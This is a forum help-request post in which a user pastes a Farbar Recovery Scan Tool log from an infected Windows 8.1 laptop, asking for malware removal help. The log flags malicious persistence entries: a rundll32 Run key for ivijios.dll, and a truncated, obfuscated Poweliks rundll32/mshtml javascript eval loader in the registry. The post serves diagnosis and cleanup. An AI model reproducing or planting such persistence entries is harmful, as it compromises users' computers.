Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Several malware issues, ivijios.dll & Wow64 error [Solved]

Started by smwifey , Jul 28 2015 03:00 PM

  • This topic is locked This topic is locked

#1
smwifey
Posted 28 July 2015 - 03:00 PM

smwifey

    Member

  • Member
  • PipPip
  • 85 posts

My brother asked me to try to speed up his computer.  After messing with it for a while I see why he is having issues.  I deleted Norton and installed Malwarbyes and Avira.  Ran Malwarebytes and it found 89 problems.  Now I am getting popups that say something about Wow64 error.  Also on restart I get ivijios.dll errors.  Installed and ran Farbar, here are scans:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:26-07-2015
Ran by Richie (administrator) on RICHIE (28-07-2015 16:34:42)
Running from C:\Users\Richie\Downloads
Loaded Profiles: Richie (Available Profiles: Richie)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3030256 2013-05-16] (Synaptics Incorporated)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [{b090579d-244c-e682-7cd6-e6daa5c7aff0}] => "C:\ProgramData\Microsoft\{b090579d-244c-e682-7cd6-e6daa5c7aff0}\{b090579d-244c-e682-7cd6-e6daa5c7aff0}.exe"
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-06-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [782008 2015-07-15] (Avira Operations GmbH & Co. KG)
HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\Run: [ivijios] => rundll32 "C:\Users\Richie\AppData\Local\ivijios.dll",ivijios <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{eedc51b2-9627-4964-8aab-3c12119ef845} <======= ATTENTION (Policy restriction on IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{406A6EC4-A42A-4564-810E-0501F8EED96A}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D51C3955-2AF3-49BA-9C94-C3C07B602A4D}: [DhcpNameServer] 192.168.254.254
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll [2012-04-26] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-05-11] ()
 
Chrome: 
=======
CHR Profile: C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-27]
CHR Extension: (Google Docs) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-27]
CHR Extension: (Google Drive) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-27]
CHR Extension: (YouTube) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-27]
CHR Extension: (Google Search) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-27]
CHR Extension: (Google Sheets) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-27]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-27]
CHR Extension: (Gmail) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [887128 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1213072 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [217280 2015-06-02] (Avira Operations GmbH & Co. KG)
S3 BthHFSrv; C:\Windows\System32\BthHFSrv.dll [324608 2014-11-21] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2015-07-10] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [266896 2012-06-13] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2012-08-31] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-28 16:34 - 2015-07-28 16:35 - 00015115 _____ C:\Users\Richie\Downloads\FRST.txt
2015-07-28 16:34 - 2015-07-28 16:34 - 00000000 ____D C:\FRST
2015-07-28 16:30 - 2015-07-28 16:30 - 02146816 _____ (Farbar) C:\Users\Richie\Downloads\FRST64.exe
2015-07-28 16:00 - 2015-07-28 16:00 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Avira
2015-07-28 15:50 - 2015-07-15 08:37 - 00148632 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00137288 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00043576 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2015-07-28 15:13 - 2015-07-28 15:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-28 15:13 - 2015-07-28 15:13 - 00001132 _____ C:\Users\Public\Desktop\Avira.lnk
2015-07-28 15:12 - 2015-07-28 15:50 - 00000000 ____D C:\Program Files (x86)\Avira
2015-07-28 15:09 - 2015-07-28 16:04 - 00000000 ____D C:\ProgramData\Avira
2015-07-28 15:06 - 2015-07-28 15:08 - 04636584 _____ (Avira Operations GmbH & Co. KG) C:\Users\Richie\Downloads\avira.exe
2015-07-27 21:59 - 2015-07-28 16:21 - 00113880 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-07-27 21:58 - 2015-07-27 21:58 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-07-27 21:03 - 2015-07-27 21:57 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Richie\Downloads\mbam-setup-2.1.8.1057.exe
2015-07-27 20:51 - 2015-07-27 20:51 - 00002275 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-27 20:51 - 2015-07-27 20:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-27 20:40 - 2015-07-28 16:09 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-27 20:40 - 2015-07-28 15:55 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-27 20:40 - 2015-07-27 21:50 - 00003892 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-27 20:40 - 2015-07-27 21:50 - 00003656 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-27 20:40 - 2015-07-27 20:50 - 00000000 ____D C:\Program Files (x86)\Google
2015-07-27 20:39 - 2015-07-27 20:51 - 00000000 ____D C:\Users\Richie\AppData\Local\Google
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Deployment
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Apps\2.0
2015-07-27 08:00 - 2015-07-27 08:00 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-24 13:07 - 2015-07-14 10:14 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-07-24 13:07 - 2015-07-14 10:13 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-07-24 13:07 - 2015-05-25 09:23 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-07-24 13:07 - 2015-05-25 09:07 - 01430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-07-22 19:34 - 2015-07-22 19:34 - 00000000 ____D C:\Users\Richie\AppData\Local\GWX
2015-07-20 08:25 - 2015-07-20 08:25 - 00000000 ____D C:\ProgramData\ATI
2015-07-20 08:00 - 2015-07-25 08:15 - 00000000 ___SD C:\WINDOWS\system32\GWX
2015-07-20 08:00 - 2015-07-20 08:00 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2015-07-17 10:59 - 2015-07-17 10:59 - 00266240 _____ C:\Users\Richie\AppData\Roaming\7afd7914.dll
2015-07-17 09:52 - 2015-07-17 09:52 - 00060601 _____ C:\WINDOWS\SysWOW64\CCCInstall_201507170952212808.log
2015-07-17 09:51 - 2015-07-17 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-07-17 09:49 - 2015-07-28 15:13 - 00000000 ____D C:\ProgramData\Package Cache
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-07-17 09:45 - 2015-07-17 09:45 - 00000000 ____D C:\AMD
2015-07-17 09:43 - 2015-07-17 09:43 - 00000000 ____D C:\Program Files\AMD
2015-07-17 08:53 - 2015-07-17 08:53 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-07-16 13:18 - 2015-06-15 18:39 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-07-16 13:18 - 2015-06-15 18:38 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 18:26 - 00633856 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-07-16 13:18 - 2015-06-15 18:24 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-07-16 13:18 - 2015-06-15 18:02 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2015-07-16 13:18 - 2015-06-15 17:58 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2015-07-16 13:18 - 2015-06-15 17:57 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 17:56 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-07-16 13:18 - 2015-06-15 17:55 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 17:49 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 17:41 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-07-16 13:18 - 2015-06-15 17:38 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 17:36 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 17:17 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 17:16 - 02427392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-07-16 13:18 - 2015-06-15 17:15 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-07-16 13:18 - 2015-06-15 17:13 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 17:04 - 00478208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-07-16 13:18 - 2015-06-15 17:03 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-07-16 13:18 - 2015-06-15 16:52 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-07-16 13:18 - 2015-06-15 16:47 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2015-07-16 13:18 - 2015-06-15 16:44 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2015-07-16 13:18 - 2015-06-15 16:43 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 16:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-07-16 13:18 - 2015-06-15 16:41 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 16:37 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 16:32 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-07-16 13:18 - 2015-06-15 16:31 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 16:30 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 16:30 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2015-07-16 13:18 - 2015-06-15 16:17 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 16:07 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-07-16 13:18 - 2015-06-15 16:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-07-16 13:18 - 2015-05-22 23:14 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-07-16 13:18 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 15:00 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-07-16 13:18 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 14:08 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-07-16 13:18 - 2015-04-21 12:13 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
2015-07-16 13:18 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2015-07-16 13:18 - 2015-01-11 22:21 - 00490496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
2015-07-16 13:18 - 2015-01-11 21:45 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
2015-07-16 12:35 - 2015-07-02 17:21 - 19877376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:50 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:49 - 25193984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:23 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:19 - 12855296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-07-16 12:35 - 2015-07-02 15:55 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-07-16 12:35 - 2015-07-02 15:20 - 14453248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
